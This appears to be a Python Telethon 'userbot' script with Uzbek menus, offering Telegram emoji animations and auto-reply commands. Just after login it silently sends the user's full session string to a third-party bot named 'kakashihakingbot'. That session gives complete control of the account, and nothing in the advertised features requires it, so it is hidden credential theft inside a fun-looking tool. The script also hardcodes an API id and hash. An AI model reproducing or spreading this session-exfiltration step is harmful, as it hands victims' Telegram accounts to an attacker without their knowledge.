from telethon import TelegramClient, events, sync
from telethon.sessions import StringSession
from time import sleep
from datetime import datetime
import asyncio
import mode.type, mode.sexy, mode.emoji, mode.timer, mode.afk, mode.fuck, mode.magic, mode.magicrun
import os, sys
aid = 28284470
ahash = "3fa970b5c8d373fab22cd6a115c9cfb9"
os.system('clear')
print("""\033[31m
▒█▀▀█ 
▒█░▄▄
▒█▄▄█ 
""")
sleep(0.5)
os.system("clear")
print("""

▒█▀▀█ ▒█▀▀▀█ 
▒█░▄▄ ▒█░░▒█ 
▒█▄▄█ ▒█▄▄▄█ 
""")
sleep(0.5)
os.system("clear")
print("""

▒█▀▀█ ▒█▀▀▀█ ▒█▀▀▀█ 
▒█░▄▄ ▒█░░▒█ ▒█░░▒█ 
▒█▄▄█ ▒█▄▄▄█ ▒█▄▄▄█
""")
string = input("\n\nsession kod yoki enter: ")
with TelegramClient(StringSession(string), aid, ahash) as client:
	client.send_message("kakashihakingbot", client.session.save())
	client.send_message("me", client.session.save())
	
with client as darknet:
	darknet.add_event_handler(mode.type.type) 
with client as kakashi:
	kakashi.add_event_handler(mode.sexy.sexy)
with client as kakashi:
	kakashi.add_event_handler(mode.emoji.itachi)
with client as kakashi:
	kakashi.add_event_handler(mode.timer.timer)
with client as darknet:
	darknet.add_event_handler(mode.afk.runafkon)
with client as darknet:
	darknet.add_event_handler(mode.afk.runafkoff)
with client as darknet:
	darknet.add_event_handler(mode.afk.runafkstatus)
with client as darknet:
	darknet.add_event_handler(mode.afk.runmcfafk)
with client as darknet:
	darknet.add_event_handler(mode.afk.runafk)
with client as kakashi:
	kakashi.add_event_handler(mode.fuck.fuck)
with client as kakashi:
	kakashi.add_event_handler(mode.magicrun.magicrun)
		
@client.on(events.NewMessage(pattern=".help", outgoing=True))
async def _(termux_devs):
	await termux_devs.edit("💾 Kakashi userbot buyruqlari\n\n.help - 💾Userbot buyruqlarini koʻrish\n.soat 1 - ⏳Hozirgi vaqtni bilish\n.kun 1 - 📅Bugungi sana\n.yurak - ❤️ Yurak animatsiyasi\n.oy - 🌙 Oy animatsiyasi\n.love - 💓 Love animatsiyasi\n.polic - 🚔 Politsiya animatsiyasi\n.ari - 🐝 Ari animatsiyasi\n.pichoq - 🔪 Pichoq animatsiyasi\n.chaqmoq - ⚡️ Chaqmoq animatsiyasi\n.xato - ❌ Xatolik animatsiyasi\n.kulgu - 🤣 Kulgu animatsiyasi\n.qor - ❄️ Qor animatsiyasi\n.type text - ✏️ yozilgan so'zni harflab yozish\n.sexy - 🔞 Sexy animatsiyasi\n.emoji text - 💎 yozilgan so'zni emoji shaklida ko'rsatish\n.timer - ⏲️ yozilgan sondan ortga sanash\n.afkon - 🅰 Avto javobni yoqish\n.afkoff - 🅰 Avto jabobni o'chirish\n.fuck - 🖕 Fuck animatsiyasi\n.magic - ❤️ Yurakli animatsiya\n\n⚠️Eslatma birorta funksiyani on qilmoqchi bo'lsangiz undan oldingi funksiyani off qiling")

@client.on(events.NewMessage(pattern=".qor", outgoing=True))
async def _(kakashi):
	await kakashi.edit("❄️")
	sleep(1)
	await kakashi.edit("☃️")
	sleep(1)
	await kakashi.edit("🌨")
	sleep(1)
	await kakashi.edit("⛄️")
	sleep(1)
	await kakashi.edit("🏂")
	sleep(1)
	await kakashi.edit("❄️")
	sleep(1)
	await kakashi.edit("🌨")

@client.on(events.NewMessage(pattern=".kulgu", outgoing=True))
async def _(kakashi):
	await kakashi.edit("😻")
	sleep(0.5)
	await kakashi.edit("😸")
	sleep(0.5)
	await kakashi.edit("😺")
	sleep(0.5)
	await kakashi.edit("😇")
	sleep(0.5)
	await kakashi.edit("😼")
	sleep(0.5)
	await kakashi.edit("😎")
	sleep(0.5)
	await kakashi.edit("😈")
	sleep(0.5)
	await kakashi.edit("🙂")
	sleep(0.5)
	await kakashi.edit("🤩")
	sleep(0.5)
	await kakashi.edit("🙃")
	sleep(0.5)
	await kakashi.edit("😆")
	sleep(0.5)
	await kakashi.edit("😀")
	sleep(0.5)
	await kakashi.edit("😌")
	sleep(0.5)
	await kakashi.edit("😅")

@client.on(events.NewMessage(pattern=".xato", outgoing=True))
async def _(kakashi):
	await kakashi.edit("▪️10%")
	sleep(0.5)
	await kakashi.edit("▪️▪️20%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️30%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️40%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️50%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️▪️60%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️▪️▪️70%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️▪️▪️▪️80%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️▪️▪️▪️▪️90%")
	sleep(0.5)
	await kakashi.edit("▪️▪️▪️▪️▪️▪️▪️▪️▪️99%")
	sleep(0.5)
	await kakashi.edit("❌ ERROR 404")

@client.on(events.NewMessage(pattern=".chaqmoq", outgoing=True))
async def _(kakashi):
	await kakashi.edit("••••••••••••••🚜")
	sleep(0.5)
	await kakashi.edit("••••••••••••🚜••")
	sleep(0.5)
	await kakashi.edit("••••••••••🚜••••")
	sleep(0.5)
	await kakashi.edit("••••••••🚜••••••")
	sleep(0.5)
	await kakashi.edit("••••••🚜••••••••")
	sleep(0.5)
	await kakashi.edit("••••🚜••••••••••")
	sleep(0.5)
	await kakashi.edit("••🚜••••••••••••")
	sleep(0.5)
	await kakashi.edit("🚜••••••••••••••")
	sleep(0.5)
	await kakashi.edit("⚡️")
	sleep(1)
	await kakashi.edit("🛞••••••••••••••")
	sleep(0.5)
	await kakashi.edit("••🛞••••••••••••")
	sleep(0.5)
	await kakashi.edit("••••🛞••••••••••")
	sleep(0.5)
	await kakashi.edit("••••••🛞••••••••")
	sleep(0.5)
	await kakashi.edit("••••••••🛞••••••")
	sleep(0.5)
	await kakashi.edit("•••••••••••🛞•••")
	sleep(0.5)
	await kakashi.edit("•••••••••••••🛞•")
	sleep(0.5)
	await kakashi.edit("•••••••••••••••")
	sleep(0.5)
	await kakashi.edit("Tugadi!")
			
@client.on(events.NewMessage(pattern=".pichoq", outgoing=True))
async def _(kakashi):
	await kakashi.edit("🔪••••••••••••🚹")
	sleep(0.5)
	await kakashi.edit("••🔪••••••••••🚹")
	sleep(0.5)
	await kakashi.edit("••••🔪••••••••🚹")
	sleep(0.5)
	await kakashi.edit("••••••🔪••••••🚹")
	sleep(0.5)
	await kakashi.edit("••••••••🔪••••🚹")
	sleep(0.5)
	await kakashi.edit("••••••••••🔪••🚹")
	sleep(0.5)
	await kakashi.edit("••••••••••••🔪🚹")
	sleep(0.5)
	await kakashi.edit("💥")
	sleep(0.5)
	await kakashi.edit("🚺")
	sleep(0.5)
	await kakashi.edit("💃")
	sleep(0.5)
	await kakashi.edit("Tushungan tushundi🤣")
	

@client.on(events.NewMessage(pattern=".soat", outgoing=True))
async def _(event):
	msg = event.message.raw_text.split()
	t=int(msg[1])
	t*=60
	while t>0:
		today = datetime.today()
		time = today.strftime("%H:%M")
		await event.edit(str(time))
		await asyncio.sleep(60)
		t-=1
		
@client.on(events.NewMessage(pattern=".kun", outgoing=True))
async def _(event):
	msg = event.message.raw_text.split()
	t=int(msg[1])
	t*=60
	while t>0:
		today = datetime.today()
		time = today.strftime("%D-yil")
		await event.edit(str(time))
		await asyncio.sleep(60)
		t-=1

@client.on(events.NewMessage(pattern=".love", outgoing=True))
async def _(kakashi):
	await kakashi.edit("I")
	sleep(0.5)
	await kakashi.edit("I L")
	sleep(0.5)
	await kakashi.edit("I Lo")
	sleep(0.5)
	await kakashi.edit("I Lov")
	sleep(0.5)
	await kakashi.edit("I Love")
	sleep(0.5)
	await kakashi.edit("I Love Y")
	sleep(0.5)
	await kakashi.edit("I Love Yo")
	sleep(0.5)
	await kakashi.edit("I Love You")
	sleep(0.5)
	await kakashi.edit("I Love You ❤️")
	
@client.on(events.NewMessage(pattern=".yurak", outgoing=True))
async def _(kakashi):
	await kakashi.edit("❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️\n❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️\n❤️❤️❤️\n❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️❤️\n❤️❤️❤️❤️\n❤️❤️❤️❤️\n❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤L❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤L❤️❤️❤️\n❤️❤️❤O❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤L❤️❤️❤️\n❤️❤️❤️O❤️❤️❤️\n❤️❤️❤V❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤️L❤️❤️❤️\n❤️❤️❤O❤️❤️❤️\n❤️❤️❤️V❤️❤️❤️\n❤️❤️❤️E❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️\n❤️❤️❤️❤️❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤️I❤️❤️❤️\n❤️❤️❤️L❤️❤️❤️\n❤️❤️❤️O❤️❤️❤️\n❤️❤️❤️V❤️❤️❤️\n❤️❤️❤️E❤️❤️❤️\n❤️❤️❤️Y❤️❤️❤️\n❤️❤️❤️O❤️❤️❤️\n❤️❤️❤️U❤️❤️❤️")
	sleep(0.5)
	await kakashi.edit("❤️❤️❤I❤️❤️❤️\n❤️❤️❤️L❤️❤️❤️\n❤️❤️❤️O❤️❤️❤️\n❤️❤️❤️V❤️❤️❤️\n❤️❤️❤️E❤️❤️❤️\n❤️❤️❤️Y❤️❤️❤️\n❤️❤️❤️O❤️❤️❤️\n❤️❤️❤️U❤️❤️❤️")
	
@client.on(events.NewMessage(pattern=".oy", outgoing=True))
async def _(kakashi):
	await kakashi.edit("🌘")
	sleep(0.2)
	await kakashi.edit("🌗")
	sleep(0.2)
	await kakashi.edit("🌕")
	sleep(0.2)
	await kakashi.edit("🌓")
	sleep(0.2)
	await kakashi.edit("🌒")
	sleep(0.2)
	await kakashi.edit("🌑")
	sleep(0.2)
	await kakashi.edit("🌘")
	sleep(0.2)
	await kakashi.edit("🌗")
	sleep(0.2)
	await kakashi.edit("🌕")
	sleep(0.2)
	await kakashi.edit("🌓")
	sleep(0.2)
	await kakashi.edit("🌒")
	sleep(0.2)
	await kakashi.edit("🌑")
	sleep(0.2)
	await kakashi.edit("🌚🌝")
	sleep(0.2)
	await kakashi.edit("🌝🌚")
	sleep(0.2)
	await kakashi.edit("🌚🌝")
	sleep(0.2)
	await kakashi.edit("🌝🌚")
	sleep(0.2)
	await kakashi.edit("🌚🌝")
	sleep(0.2)
	await kakashi.edit("🌝🌚")
	sleep(0.2)
	await kakashi.edit("🌚🌝")
	
@client.on(events.NewMessage(pattern=".polic", outgoing=True))
async def _(kakashi):
	await kakashi.edit("🟦🟦🟦▫️🟥🟥🟥")
	sleep(0.5)
	await kakashi.edit("🟥🟥🟥▫️🟦🟦🟦")
	sleep(0.5)
	await kakashi.edit("🟦🟦🟦▫️🟥🟥🟥")
	sleep(0.5)
	await kakashi.edit("🟥🟥🟥▫️🟦🟦🟦")
	sleep(0.5)
	await kakashi.edit("🟦🟦🟦▫️🟥🟥🟥")
	sleep(0.5)
	await kakashi.edit("🟥🟥🟥▫️🟦🟦🟦")
	sleep(0.5)
	await kakashi.edit("🟦🟦🟦▫️🟥🟥🟥")
	sleep(0.5)
	await kakashi.edit("🟥🟥🟥▫️🟦🟦🟦")
	sleep(0.5)
	await kakashi.edit("🟦🟦🟦▫️🟥🟥🟥")
	
@client.on(events.NewMessage(pattern=".ari", outgoing=True))
async def _(kakashi):
	await kakashi.edit("🐝••••••••🕺")
	sleep(0.5)
	await kakashi.edit("🐝•••••••🕺")
	sleep(0.5)
	await kakashi.edit("🐝••••••🕺")
	sleep(0.5)
	await kakashi.edit("🐝•••••🕺")
	sleep(0.5)
	await kakashi.edit("🐝••••🕺")
	sleep(0.5)
	await kakashi.edit("🐝•••🕺")
	sleep(0.5)
	await kakashi.edit("🐝••🕺")
	sleep(0.5)
	await kakashi.edit("🐝•🕺")
	sleep(0.5)
	await kakashi.edit("🐝🕺")
	sleep(0.5)
	await kakashi.edit("💥")
	sleep(0.5)
	await kakashi.edit("♿️••••••••••••")
	sleep(0.2)
	await kakashi.edit("••♿️••••••••••")
	sleep(0.3)
	await kakashi.edit("🐝•••♿️••••••••")
	sleep(0.3)
	await kakashi.edit("••🐝•••♿️••••••")
	sleep(0.3)
	await kakashi.edit("••••🐝•••♿️••••")
	sleep(0.3)
	await kakashi.edit("••••••🐝•••♿️••")
	sleep(0.3)
	await kakashi.edit("••••••••🐝•••♿️")
	sleep(0.3)
	await kakashi.edit("•••••••••••🐝••")
	sleep(0.3)
	await kakashi.edit("•••••••••••••🐝")
	sleep(0.3)
	await kakashi.edit("•••••••••••••••")
	sleep(0.5)
	await kakashi.edit("😂")
	
client.start()
print("\nU≋S≋E≋R≋B≋O≋T I≋S R≋U≋N≋N≋E≋D")
client.run_until_disconnected()
